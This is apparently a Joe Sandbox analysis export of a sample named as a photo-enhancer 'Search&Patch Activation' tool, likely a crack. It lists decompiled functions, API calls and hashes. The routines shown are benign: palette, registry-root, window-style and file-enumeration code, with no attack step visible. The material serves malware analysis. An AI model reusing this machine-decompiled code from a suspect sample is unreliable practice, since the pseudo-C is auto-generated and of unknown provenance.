0x0041ba40
0x0041ba71
0x0041ba72
0x0041ba74
0x0041ba76
0x0041ba77
0x0041ba7c
0x0041ba7c
0x0041ba7f
0x0041ba81
0x0041ba88
0x0041ba8f
0x0041ba93
0x0041ba98
0x0041ba99
0x0041ba9c
0x0041ba9c
0x0041ba9c
0x0041ba7f
0x0041ba47
0x0041ba53
0x0041ba6a
0x0041ba6a
0x0041ba9f
0x0041baa9
0x0041babb
0x0041babb

APIs

GetFocus.USER32(00000000,0041BAE8,?,?,00000001,?), ref: 0041BA0E
GetDC.USER32(?), ref: 0041BA1A
GetDeviceCaps.GDI32(?,00000068), ref: 0041BA36
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041BA53
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041BA6A
ReleaseDC.USER32 ref: 0041BAB6

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
String ID:
API String ID: 2502006586-0
Opcode ID: 8677b4c9643155cfa8b241eb815e8948b89f536ec76e5c7ec5a5b4487363e7b6
Instruction ID: a7c0e65a03819a5ca0ecfd2330013adb4d65aecf06c5c54e884ed256bbcda07e
Opcode Fuzzy Hash: 8677b4c9643155cfa8b241eb815e8948b89f536ec76e5c7ec5a5b4487363e7b6
Instruction Fuzzy Hash: 7941C371A042149FDB10DFA9C886AAFBBB4EF45740F1484AAF940EB351D238AD11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0045D8DC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0045D8DC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				char _v8;
				void* _t35;
				void* _t44;
				intOrPtr _t48;
				void* _t49;
				void* _t51;
				void* _t57;
				intOrPtr _t60;

				_t55 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t57 = __ecx;
				_t35 = __eax;
				_push(_t60);
				_push(0x45d9a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60;
				_t44 = __edx - 0x80000000;
				if(_t44 == 0) {
					E00403494( &_v8, "CLASSES_ROOT");
					goto L10;
				} else {
					_t49 = _t44 - 1;
					if(_t49 == 0) {
						E00403494( &_v8, "CURRENT_USER");
						goto L10;
					} else {
						_t51 = _t49 - 1;
						if(_t51 == 0) {
							E00403494( &_v8, "MACHINE");
							goto L10;
						} else {
							if(_t51 == 1) {
								E00403494( &_v8, 0x45da04);
								L10:
								_push(_v8);
								_push(0x45da14);
								_push(_t57);
								E00403634();
								SetLastError(E0045D72C(_a4 & 0xffffff00 | _t35 == 0x00000002, _t35, _v8, 4, _t55, _t57, 2, _a4, _a8));
							} else {
								SetLastError(0x57);
							}
						}
					}
				}
				_pop(_t48);
				 *[fs:eax] = _t48;
				_push(0x45d9af);
				return E00403400( &_v8);
			}

0x0045d8dc
0x0045d8df
0x0045d8e1
0x0045d8e2
0x0045d8e3
0x0045d8e4
0x0045d8e6
0x0045d8ea
0x0045d8eb
0x0045d8f0
0x0045d8f3
0x0045d8f6
0x0045d8fc
0x0045d911
0x00000000
0x0045d8fe
0x0045d8fe
0x0045d8ff
0x0045d920
0x00000000
0x0045d901
0x0045d901
0x0045d902
0x0045d92f
0x00000000
0x0045d904
0x0045d905
0x0045d93e
0x0045d950
0x0045d950
0x0045d953
0x0045d958
0x0045d961
0x0045d986
0x0045d907
0x0045d947
0x0045d94c
0x0045d905
0x0045d902
0x0045d8ff
0x0045d994
0x0045d997
0x0045d99a
0x0045d9a7

APIs

SetLastError.KERNEL32(00000057,00000000,0045D9A8,?,?,?,?,00000000), ref: 0045D947
SetLastError.KERNEL32(00000000,00000002,?,?,?,0045DA14,?,00000000,0045D9A8,?,?,?,?,00000000), ref: 0045D986

Strings

USERS, xrefs: 0045D939
CLASSES_ROOT, xrefs: 0045D90C
CURRENT_USER, xrefs: 0045D91B
MACHINE, xrefs: 0045D92A

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast
String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
API String ID: 1452528299-1580325520
Opcode ID: e67dd52cdc243cbb5e72bacc990bd15c15be47e674f81fc936459ad46248d631
Instruction ID: 6e5dfac74c505aaab96e92fe344d79fc6b24c6561d5ee78f4b35f8cdf0e82ab5
Opcode Fuzzy Hash: e67dd52cdc243cbb5e72bacc990bd15c15be47e674f81fc936459ad46248d631
Instruction Fuzzy Hash: 1611A5B5A04209AFD731DEA1C941BAA7AACDF48306F6040376D04A6283D67C5F0AD52E

Uniqueness

Uniqueness Score: -1.00%

Function 0041C21C Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041C21C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v30;
				int _v40;
				int _v44;
				struct HDC__* _v48;
				signed int _t31;
				signed int _t34;
				intOrPtr _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr _t59;

				_t57 = _t58;
				_t59 = _t58 + 0xffffff8c;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v24 = _v16 << 4;
				_v20 = E00406E6C(_v24, __edx, __edi, __eflags);
				 *[fs:0x0] = _t59;
				 *((intOrPtr*)( *_v8))( *[fs:0x0], 0x41c4c8, _t57, __edi, __esi, __ebx, _t56);
				_v44 = GetSystemMetrics(0xb);
				_v40 = GetSystemMetrics(0xc);
				_v48 = GetDC(0);
				if(_v48 == 0) {
					E0041B824();
				}
				_push(_t57);
				_push(0x41c2ec);
				_push( *[fs:edx]);
				 *[fs:edx] = _t59;
				_t31 = GetDeviceCaps(_v48, 0xe);
				_t34 = _t31 * GetDeviceCaps(_v48, 0xc);
				if(_t34 != 0x18) {
					__eflags = 1;
					_v30 = 1 << _t34;
				} else {
					_v30 = 0;
				}
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E0041C2F3);
				return ReleaseDC(0, _v48);
			}

0x0041c21d
0x0041c21f
0x0041c225
0x0041c228
0x0041c22b
0x0041c234
0x0041c23f
0x0041c24f
0x0041c261
0x0041c26a
0x0041c274
0x0041c27e
0x0041c285
0x0041c287
0x0041c287
0x0041c28e
0x0041c28f
0x0041c294
0x0041c297
0x0041c2a0
0x0041c2b6
0x0041c2bc
0x0041c2cc
0x0041c2cf
0x0041c2be
0x0041c2be
0x0041c2be
0x0041c2d5
0x0041c2d8
0x0041c2db
0x0041c2eb

APIs

GetSystemMetrics.USER32 ref: 0041C265
GetSystemMetrics.USER32 ref: 0041C26F
GetDC.USER32(00000000), ref: 0041C279
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041C2A0
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041C2AD
ReleaseDC.USER32 ref: 0041C2E6

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: b56dce364db8681bf449ce1525ba10edc72df88ae5eafd2cc45f48ffa874235a
Instruction ID: 9f2a90fdc7dd77bbc6d9abc5b90aadbfd0b864dc6f709442552c07669a95c1ee
Opcode Fuzzy Hash: b56dce364db8681bf449ce1525ba10edc72df88ae5eafd2cc45f48ffa874235a
Instruction Fuzzy Hash: 07213C75E44649AFEB00EFE9C882BEEB7B4EB48714F10806AF514B7280D7795940CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00401A90 Relevance: 9.1, APIs: 6, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00401A90() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t18;
				intOrPtr _t22;
				intOrPtr _t24;

				_t22 = _t24;
				if( *0x49e419 == 0) {
					return _t2;
				} else {
					_push(_t22);
					_push(E00401B68);
					_push( *[fs:edx]);
					 *[fs:edx] = _t24;
					if( *0x49e036 != 0) {
						_push(0x49e420);
						L00401328();
					}
					 *0x49e419 = 0;
					_t3 =  *0x49e478; // 0x5d99e8
					LocalFree(_t3);
					 *0x49e478 = 0;
					_t18 =  *0x49e440; // 0x5daffc
					while(_t18 != 0x49e440) {
						VirtualFree( *(_t18 + 8), 0, 0x8000);
						_t18 =  *_t18;
					}
					E00401390(0x49e440);
					E00401390(0x49e450);
					E00401390(0x49e47c);
					_t14 =  *0x49e438; // 0x5da9e8
					while(_t14 != 0) {
						 *0x49e438 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x49e438; // 0x5da9e8
					}
					_pop( *[fs:0x0]);
					_push(0x401b6f);
					if( *0x49e036 != 0) {
						_push(0x49e420);
						L00401330();
					}
					_push(0x49e420);
					L00401338();
					return _t14;
				}
			}

0x00401a91
0x00401a9b
0x00401b71
0x00401aa1
0x00401aa3
0x00401aa4
0x00401aa9
0x00401aac
0x00401ab6
0x00401ab8
0x00401abd
0x00401abd
0x00401ac2
0x00401ac9
0x00401acf
0x00401ad6
0x00401adb
0x00401af5
0x00401aee
0x00401af3
0x00401af3
0x00401b02
0x00401b0c
0x00401b16
0x00401b1b
0x00401b22
0x00401b26
0x00401b2d
0x00401b32
0x00401b37
0x00401b3b
0x00401b45
0x00401b51
0x00401b53
0x00401b58
0x00401b58
0x00401b5d
0x00401b62
0x00401b67
0x00401b67

APIs

RtlEnterCriticalSection.KERNEL32(0049E420,00000000,00401B68), ref: 00401ABD
LocalFree.KERNEL32(005D99E8,00000000,00401B68), ref: 00401ACF
VirtualFree.KERNEL32(?,00000000,00008000,005D99E8,00000000,00401B68), ref: 00401AEE
LocalFree.KERNEL32(005DA9E8,?,00000000,00008000,005D99E8,00000000,00401B68), ref: 00401B2D
RtlLeaveCriticalSection.KERNEL32(0049E420,00401B6F), ref: 00401B58
RtlDeleteCriticalSection.KERNEL32(0049E420,00401B6F), ref: 00401B62

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 27230fc28db66510afed4ac7e76b62a69bf1a257bd7dde38b68ece54281650c8
Instruction ID: e11c9f51ffc8675c4dd52d411ec329e75971582e09b40c19516fbc4ecb4e7f79
Opcode Fuzzy Hash: 27230fc28db66510afed4ac7e76b62a69bf1a257bd7dde38b68ece54281650c8
Instruction Fuzzy Hash: 1E119D30B00340AAEB15EB67AC82B263BE49765708F44047BF40067AF2D67DA840876E

Uniqueness

Uniqueness Score: -1.00%

Function 0048099C Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0048099C(void* __eax) {
				intOrPtr _t12;
				signed int _t15;
				intOrPtr _t16;
				intOrPtr _t19;
				signed int _t21;
				long _t22;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				void* _t32;

				_t32 = __eax;
				_t12 =  *0x49e62c; // 0x2252410
				_t15 = GetWindowLongA( *(_t12 + 0x20), 0xffffffec) & 0xffffff00 | (_t14 & 0x00000080) == 0x00000000;
				if(_t32 != _t15) {
					_t16 =  *0x49e62c; // 0x2252410
					SetWindowPos( *(_t16 + 0x20), 0, 0, 0, 0, 0, 0x97);
					_t19 =  *0x49e62c; // 0x2252410
					_t21 = GetWindowLongA( *(_t19 + 0x20), 0xffffffec);
					if(_t32 == 0) {
						_t22 = _t21 | 0x00000080;
					} else {
						_t22 = _t21 & 0xffffff7f;
					}
					_t23 =  *0x49e62c; // 0x2252410
					SetWindowLongA( *(_t23 + 0x20), 0xffffffec, _t22);
					if(_t32 == 0) {
						_t26 =  *0x49e62c; // 0x2252410
						return SetWindowPos( *(_t26 + 0x20), 0, 0, 0, 0, 0, 0x57);
					} else {
						_t29 =  *0x49e62c; // 0x2252410
						return ShowWindow( *(_t29 + 0x20), 5);
					}
				}
				return _t15;
			}

0x0048099d
0x004809a1
0x004809b1
0x004809b6
0x004809c7
0x004809d0
0x004809d7
0x004809e0
0x004809e7
0x004809f0
0x004809e9
0x004809e9
0x004809e9
0x004809f8
0x00480a01
0x00480a08
0x00480a28
0x00000000
0x00480a0a
0x00480a0c
0x00000000
0x00480a15
0x00480a08
0x00480a37

APIs

GetWindowLongA.USER32 ref: 004809AA
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046E2F5), ref: 004809D0
GetWindowLongA.USER32 ref: 004809E0
SetWindowLongA.USER32 ref: 00480A01
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00480A15
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00480A31

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: fd47eba282066f6077479a46be718dc6a36e411284a163d57f72b468d1ce45bd
Instruction ID: 5fbc0a759a363429862e9e166b445db90943e559ec10ec679e577617c806b0ab
Opcode Fuzzy Hash: fd47eba282066f6077479a46be718dc6a36e411284a163d57f72b468d1ce45bd
Instruction Fuzzy Hash: 3C014CB1650210ABD710EB79CD41F2A77A8AB2D310F054767FA55EB3E3C239EC048B08

Uniqueness

Uniqueness Score: -1.00%

Function 0041B700 Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B700(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041AB70( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041AB70( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041ABEC( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041A4E8(E0041AB34( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041A4E8(E0041AB34( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x0041b701
0x0041b70c
0x0041b71e
0x0041b72d
0x0041b767
0x0041b778
0x0041b72f
0x0041b741
0x0041b752
0x0041b752

APIs

Part of subcall function 0041AB70: CreateBrushIndirect.GDI32 ref: 0041ABDB

UnrealizeObject.GDI32(00000000), ref: 0041B70C
SelectObject.GDI32(?,00000000), ref: 0041B71E
SetBkColor.GDI32(?,00000000), ref: 0041B741
SetBkMode.GDI32(?,00000002), ref: 0041B74C
SetBkColor.GDI32(?,00000000), ref: 0041B767
SetBkMode.GDI32(?,00000001), ref: 0041B772

Part of subcall function 0041A4E8: GetSysColor.USER32(?), ref: 0041A4F2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: c61030d912a8a6847aea8d9dd9de33bb9ce49b13cbe3d1a7ba6db01534d8f73f
Instruction ID: e5a7d4b7c2e235827ad94a1825542cc68ab193fc61db3cfd758683236e3ca83d
Opcode Fuzzy Hash: c61030d912a8a6847aea8d9dd9de33bb9ce49b13cbe3d1a7ba6db01534d8f73f
Instruction Fuzzy Hash: 25F0C275615100ABDE00FFBADACAE4B37989F443097048097B504DF197C67CE8504B39

Uniqueness

Uniqueness Score: -1.00%

Function 00473AB4 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 272
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00473AB4(char __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v5;
				intOrPtr _v12;
				signed int _v16;
				signed int _v17;
				signed int _v24;
				char _v28;
				signed int _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				struct _WIN32_FIND_DATAA _v368;
				char _v372;
				char _v376;
				signed int _t154;
				intOrPtr _t161;
				intOrPtr _t165;
				intOrPtr _t170;
				signed int _t188;
				int _t191;
				signed char _t211;
				signed char _t212;
				void* _t229;
				intOrPtr* _t239;
				signed int _t250;
				intOrPtr _t269;
				intOrPtr _t286;
				intOrPtr _t294;
				void* _t305;
				void* _t306;
				intOrPtr _t307;

				_t303 = __esi;
				_t302 = __edi;
				_t305 = _t306;
				_t307 = _t306 + 0xfffffe8c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v372 = 0;
				_v376 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v5 = __eax;
				_push(_t305);
				_push(0x473e75);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307;
				_push(_v12);
				_push(_v16);
				_push(_a20);
				E00403634();
				_v17 = 0;
				_t252 =  &_v368;
				_v40 = E00453238(_v5,  &_v368, _v24, __eflags);
				if(_v40 == 0xffffffff) {
					_t154 = _a12;
					__eflags =  *(_t154 + 0x50) & 0x00000020;
					if(( *(_t154 + 0x50) & 0x00000020) == 0) {
						L23:
						__eflags = _v16;
						if(_v16 != 0) {
							_t161 = _a12;
							__eflags =  *(_t161 + 0x51) & 0x00000002;
							if(( *(_t161 + 0x51) & 0x00000002) != 0) {
								__eflags = _v17;
								if(_v17 == 0) {
									_t120 =  &_v36; // 0x4740e8
									E0047E4A8( *((intOrPtr*)(_a12 + 4)), _t252, _t120);
									_t165 = _a12;
									__eflags =  *(_t165 + 0x4f) & 0x00000010;
									if(( *(_t165 + 0x4f) & 0x00000010) != 0) {
										_t130 =  &_v36; // 0x4740e8
										E0042CDE4( *_t130, _t252,  &_v372);
										_t132 =  &_v36; // 0x4740e8
										E004035C0(_t132, _v16, _v372);
									} else {
										_t127 =  &_v36; // 0x4740e8
										E0040357C(_t127, _v16);
									}
									_t250 =  *0x473ea0; // 0x0
									_t170 = _a12;
									__eflags =  *(_t170 + 0x4e) & 0x00000002;
									if(( *(_t170 + 0x4e) & 0x00000002) != 0) {
										_t250 = _t250 | 0x00000001;
										__eflags = _t250;
									}
									__eflags =  *(_a12 + 0x4e) & 0x00000008;
									if(__eflags != 0) {
										__eflags = _t250;
									}
									_t144 =  &_v36; // 0x4740e8
									E00471340(_v5, _t250, _t250,  *_t144, _t302, _t303, __eflags,  *((intOrPtr*)(_a24 + 8)));
									_v17 = 1;
								}
							}
						}
						E0046FC2C();
						__eflags = 0;
						_pop(_t269);
						 *[fs:eax] = _t269;
						_push(0x473e7c);
						E00403420( &_v376, 2);
						_t148 =  &_v36; // 0x4740e8
						return E00403420(_t148, 4);
					} else {
						E00403494( &_v372, _v12);
						E0040357C( &_v372, _v16);
						E0040357C( &_v372, 0x473e90);
						_t252 =  &_v368;
						_v40 = E00453238(_v5,  &_v368, _v372, __eflags);
						__eflags = _v40 - 0xffffffff;
						if(_v40 == 0xffffffff) {
							goto L23;
						} else {
							__eflags = 0;
							_push(_t305);
							_push(0x473da7);
							_push( *[fs:eax]);
							 *[fs:eax] = _t307;
							do {
								_t188 = E0047F860( &_v368);
								__eflags = _t188;
								if(_t188 != 0) {
									E00403494( &_v372, _v16);
									E0040355C( &_v376, 0x104,  &(_v368.cFileName));
									E0040357C( &_v372, _v376);
									E0040357C( &_v372, 0x473e9c);
									_t211 = E00473AB4(_v5, 0, _v372, _v12, _t302, _t303, __eflags, _a4, _a8, _a12, _a16, _a20, _a24) | _v17;
									__eflags = _t211;
									_v17 = _t211;
								}
								_t191 = FindNextFileA(_v40,  &_v368);
								__eflags = _t191;
							} while (_t191 != 0);
							__eflags = 0;
							_pop(_t286);
							 *[fs:eax] = _t286;
							_push(0x473dae);
							return FindClose(_v40);
						}
					}
				} else {
					_push(_t305);
					_push(0x473c85);
					_push( *[fs:edx]);
					 *[fs:edx] = _t307;
					do {
						_t212 = _v368.dwFileAttributes;
						if((_t212 & 0x00000010) == 0) {
							if(_a16 == 0) {
								E00403494( &_v28, _a20);
								L7:
								_v17 = 1;
								_push(_v12);
								_push(_v16);
								_push(_v28);
								E00403634();
								_t35 =  &_v36; // 0x4740e8
								E0047E4A8( *((intOrPtr*)(_a12 + 4)), _t252, _t35);
								if(( *(_a12 + 0x4f) & 0x00000010) != 0) {
									__eflags = _v16;
									if(_v16 != 0) {
										_t48 =  &_v36; // 0x4740e8
										E0042CDE4( *_t48, _t252,  &_v372);
										_push(_v372);
										_push(_v16);
										_t52 =  &_v36; // 0x4740e8
										E0042CDBC( *_t52, _t252,  &_v376);
										_push(_v376);
										E00403634();
									}
								} else {
									_t42 =  &_v36; // 0x4740e8
									_push( *_t42);
									_push(_v16);
									_push(_v28);
									E00403634();
								}
								_v44 = _v368.nFileSizeHigh;
								_v48 = _v368.nFileSizeLow;
								_t229 = E0043106C( &_v48, _a4);
								_t315 = _t229;
								if(_t229 > 0) {
									_t239 = _a4;
									_v48 =  *_t239;
									_t63 = _t239 + 4; // 0x2268b28
									_v44 =  *_t63;
								}
								_t67 =  &_v36; // 0x4740e8
								E00472090(_a12, 0, _v32, _v5, _t302, _t303, _t315,  &_v48, _a8,  *_t67,  *((intOrPtr*)(_a24 + 8)));
								_pop(_t252);
								E00431094(_a4,  &_v48);
							} else {
								if((_t212 & 0x00000002) == 0) {
									_t252 = 0x104;
									E0040355C( &_v28, 0x104,  &(_v368.cFileName));
									goto L7;
								}
							}
						}
					} while (FindNextFileA(_v40,  &_v368) != 0);
					_pop(_t294);
					 *[fs:eax] = _t294;
					_push(0x473c8c);
					return FindClose(_v40);
				}
			}

0x00473ab4
0x00473ab4
0x00473ab5
0x00473ab7
0x00473abd
0x00473abe
0x00473abf
0x00473ac2
0x00473ac8
0x00473ace
0x00473ad1
0x00473ad4
0x00473ad7
0x00473ada
0x00473add
0x00473ae0
0x00473ae5
0x00473ae6
0x00473aeb
0x00473aee
0x00473af1
0x00473af4
0x00473af7
0x00473b02
0x00473b07
0x00473b0b
0x00473b1c
0x00473b23
0x00473c8c
0x00473c8f
0x00473c93
0x00473dae
0x00473dae
0x00473db2
0x00473db8
0x00473dbb
0x00473dbf
0x00473dc5
0x00473dc9
0x00473dcb
0x00473dd4
0x00473dd9
0x00473ddc
0x00473de0
0x00473df5
0x00473df8
0x00473e03
0x00473e09
0x00473de2
0x00473de2
0x00473de8
0x00473de8
0x00473e0e
0x00473e14
0x00473e17
0x00473e1b
0x00473e1d
0x00473e1d
0x00473e1d
0x00473e23
0x00473e27
0x00473e29
0x00473e29
0x00473e35
0x00473e3b
0x00473e41
0x00473e41
0x00473dc9
0x00473dbf
0x00473e45
0x00473e4a
0x00473e4c
0x00473e4f
0x00473e52
0x00473e62
0x00473e67
0x00473e74
0x00473c99
0x00473ca2
0x00473cb0
0x00473cc0
0x00473ccb
0x00473cd9
0x00473cdc
0x00473ce0
0x00000000
0x00473ce6
0x00473ce6
0x00473ce8
0x00473ce9
0x00473cee
0x00473cf1
0x00473cf4
0x00473cfa
0x00473cff
0x00473d01
0x00473d24
0x00473d3a
0x00473d4b
0x00473d5b
0x00473d72
0x00473d72
0x00473d75
0x00473d75
0x00473d83
0x00473d88
0x00473d88
0x00473d90
0x00473d92
0x00473d95
0x00473d98
0x00473da6
0x00473da6
0x00473ce0
0x00473b29
0x00473b2b
0x00473b2c
0x00473b31
0x00473b34
0x00473b37
0x00473b37
0x00473b3f
0x00473b49
0x00473b6e
0x00473b73
0x00473b73
0x00473b77
0x00473b7a
0x00473b7d
0x00473b88
0x00473b8d
0x00473b96
0x00473ba2
0x00473bbc
0x00473bc0
0x00473bc8
0x00473bcb
0x00473bd0
0x00473bd6
0x00473bdf
0x00473be2
0x00473be7
0x00473bf5
0x00473bf5
0x00473ba4
0x00473ba4
0x00473ba4
0x00473ba7
0x00473baa
0x00473bb5
0x00473bb5
0x00473c00
0x00473c09
0x00473c12
0x00473c17
0x00473c19
0x00473c1b
0x00473c20
0x00473c23
0x00473c26
0x00473c26
0x00473c30
0x00473c45
0x00473c4a
0x00473c51
0x00473b4b
0x00473b4d
0x00473b5c
0x00473b61
0x00000000
0x00473b61
0x00473b4d
0x00473b49
0x00473c66
0x00473c70
0x00473c73
0x00473c76
0x00473c84
0x00473c84

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,00473C85,?,00000000,?,0049F1E4,00000000,00473E75,?,00000000,?,00000000,?,00474041), ref: 00473C61
FindClose.KERNEL32(000000FF,00473C8C,00473C85,?,00000000,?,0049F1E4,00000000,00473E75,?,00000000,?,00000000,?,00474041,?), ref: 00473C7F
FindNextFileA.KERNEL32(000000FF,?,00000000,00473DA7,?,00000000,?,0049F1E4,00000000,00473E75,?,00000000,?,00000000,?,00474041), ref: 00473D83
FindClose.KERNEL32(000000FF,00473DAE,00473DA7,?,00000000,?,0049F1E4,00000000,00473E75,?,00000000,?,00000000,?,00474041,?), ref: 00473DA1

Strings

@G, xrefs: 00473E67, 00473DCB, 00473DF5, 00473E03, 00473E35, 00473DE2, 00473B8D, 00473C30, 00473BC8, 00473BDF, 00473BED, 00473BA4, 00473BAD, 00473C33

Memory Dump Source

